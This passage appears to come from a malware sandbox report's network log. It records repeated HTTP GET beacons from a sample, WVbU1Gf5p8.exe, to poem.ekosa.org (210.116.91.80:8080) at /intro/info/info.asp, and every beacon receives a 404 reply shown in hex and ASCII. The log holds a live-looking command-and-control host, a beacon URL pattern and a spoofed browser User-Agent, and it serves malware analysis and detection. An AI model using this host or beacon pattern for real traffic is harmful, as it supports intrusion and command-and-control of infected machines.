      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:56.951431990 CET83INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.449758210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:57.222948074 CET86OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:57.485622883 CET90INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      10192.168.2.449771210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:02.398149014 CET245OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:02.659898996 CET249INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      100192.168.2.449878210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:54.989450932 CET4307OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:55.253542900 CET4307INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      101192.168.2.449879210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:55.525911093 CET5086OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:55.787642002 CET5087INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      102192.168.2.449880210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:56.170101881 CET5087OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:56.433552980 CET5088INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      103192.168.2.449881210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:56.700265884 CET5089OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:56.958790064 CET5089INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      104192.168.2.449882210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:57.228408098 CET5090OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:57.488831043 CET5091INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      105192.168.2.449883210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:57.871535063 CET5092OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:58.131800890 CET5092INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      106192.168.2.449884210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:58.467463970 CET5093OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:58.729218960 CET5093INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      107192.168.2.449885210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:59.168667078 CET5094OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:59.432661057 CET5095INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
